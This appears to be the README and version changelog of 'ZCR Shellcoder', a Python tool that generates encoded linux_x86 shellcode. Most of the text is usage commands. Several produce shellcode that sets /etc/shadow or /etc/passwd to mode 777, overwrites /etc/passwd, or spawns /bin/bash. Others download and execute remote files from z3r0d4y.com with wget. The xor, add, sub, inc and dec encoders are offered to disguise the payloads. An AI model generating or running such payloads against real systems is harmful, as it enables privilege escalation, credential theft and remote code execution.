
ZeroDay Cyber Research - ZCR Shellcoder - z3r0d4y.com Shellcode Generator

Primary LanguageHTMLOtherNOASSERTION

version 1.0.4: Infinity
add inc encoding chmod() [linux_x86]
add inc_timesyouwant chmod() [linux_x86]
add dec encoding chmod() [linux_x86]
add dec_timesyouwant chmod() [linux_x86]
add features table inside "features_table.html"
add -about to menu for developers name and etc
add color output for windows cmd
fixed permission number calculating in chmod() [linux_x86]
software's signature changes

>python shellcoder.py -os linux_x86 -encode inc -job chmod('/etc/passwd','777') -o file
>python shellcoder.py -os linux_x86 -encode dec -job chmod('/etc/passwd','777') -o file
>python shellcoder.py -os linux_x86 -encode inc_10 -job chmod('/etc/passwd','777') -o file
>python shellcoder.py -os linux_x86 -encode dec_30 -job chmod('/etc/passwd','777') -o file

Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big

version 1.0.3: AWAKE
add xor_random encoding chmod() [linux_x86]
add xor_yourvalue encoding chmod() [linux_x86]
add add_random encoding chmod() [linux_x86]
add add_yourvalue encoding chmod() [linux_x86]
add sub_random encoding chmod() [linux_x86]
add sub_yourvalue encoding chmod() [linux_x86]
fixed shellcode encode type checking

>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444') -o file.txt

Note: each time you execute chmod() function with random encode, you are gonna get random outputs and different shellcode.

>python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job chmod('/etc/passwd','444') -o file.txt

Note: your xor value could be anything. "xor_0x41414141" and "xor_0x45872f4d" are examples.

>python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444') -o file.txt
>python shellcoder.py -os linux_x86 -encode add_0x41414141 -job chmod('/etc/passwd','777') -o file.txt

>python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job chmod('/etc/passwd','444') -o file.txt

version 1.0.2: SKIP
[linux_x86 modules completed]
add script_executor() [linux - using command execution]
add download_execute() [linux_x86 - using command execution (wget)]  
add download() [linux_x86 - using command execution (wget)] 
add dir_create() [linux_x86 using command execution] 
add file_create() [linux_x86 using command execution]
add encodes file for next version released

>python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello.txt','hello') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello2.txt','hello[space]world[space]!') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job dir_create('/root/Desktop/mydirectory') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job download('http://www.z3r0d4y.com/exploit.type','myfile.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type') -o file.txt

#multi command
>python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('script.type','D:\\myfile.type','./script.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py') -o file.txt

Note: Remember don't use " " and replace it with "[space]"
Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo]

version 1.0.1: BOILING_POINT
add system() [linux_x86 command execute]
fixed chmod filename 1/4 char length [linux_x86]
fixed exec filename 1/4 char length [linux_x86]
fixed write filename 1/4 length [linux_x86]
fixed write content 1/4 length [linux_x86]
fixed write length calculator [linux_x86]
and fixed some other bugs in coding [core]


system() function added in script, you can use it to do anything and generate any command line shellcode.
Note: Don't use space ' ' in system() function, replace it with "[space]" , software will detect and replace " " for you in shellcode.

>python shellcoder.py -os linux_x86 -encode none -job system('ls') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('ls[space]-la') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('wget[space]file;sh[space]file') -o file.txt

version 1.0.0: ASIIN_BLUE_RUBY
add chmod() [linux_x86] -> chmod('/path/file','perm_num')
add write() [linux_x86] -> write('/path/file','content')
add exec() [linux_x86]  -> exec('/path/file')
add encode [none - all os] 


>python shellcoder.py -h 

-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch

-update => check for update

>python shellcoder.py -oslist

[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

>python shellcoder.py -joblist

[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

>python shellcoder.py -types

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Generating shellcodes , using functions:
>python shellcoder.py -os linux_x86 -encode none -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job write('/etc/passwd','user:pass') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job exec('/bin/bash') -o file.txt

Note: exec() doesn't support any ARGV same as exec('/bin/bash -c ls') or exec('/bin/bash','-c','ls'), you have to wait for next version and this feature will available  in system()